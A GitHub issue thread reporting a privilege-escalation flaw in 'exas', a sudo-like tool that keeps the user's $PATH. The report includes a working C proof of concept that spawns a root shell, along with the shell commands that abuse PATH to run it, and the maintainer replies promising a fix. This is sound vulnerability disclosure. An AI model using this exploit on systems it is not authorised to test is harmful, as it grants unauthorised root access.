### ISSUE TITLE
Writable $PATH allows for privilege escalation

### ISSUE THREAD

**Issue by JorianWoltjer** [b3yc0d3/exas#2]
The `$PATH` variable is kept in the elevated process that the user requests. If they are allowed one command such as `whoami`, without an absolute path, they can overwrite this program with the PATH variable:

```c
//config.h
static const Rule rules[] = {
    /* permit   user      group   target user  command     arguments */
    { true,     "user",   NULL,   "root",      "whoami",   NULL},
};
```

The above rule might be common to let the `user` execute `whoami` as `root`. An attacker can abuse this by creating another binary named "whoami" that executes any code they want, like a shell. Then executing it with the path where the malicious "whoami" resides inside the PATH variable will execute that binary instead of the regular `whoami`:

```c
//shell.c
#define _GNU_SOURCE
#include <unistd.h>
#include <stdlib.h>

void main() {
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

```shell
user@machine$ id  # low-level user
uid=1001(user) gid=1001(user) groups=1001(user)
user@machine$ gcc shell.c -o whoami
user@machine$ PATH=.:$PATH exas whoami  # whoami executes bash shell instead
password for user:
root@machine# id
uid=0(root) gid=1001(user) groups=1001(user)
```

The real `sudo` in comparison protects this by removing environment variables the user sets:

```shell
...
user@machine$ PATH=.:$PATH sudo whoami
root
user@machine$ PATH=.:$PATH sudo env | grep PATH  # notice the PATH variable is reset
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
```

**Comment by b3yc0d3** [comment]
Thanks JorianWoltjer,
i really appreciate your very good explanation of the security vulnerability, i never would have thought about that issue. I'll fix it as soon as i find time to do so.
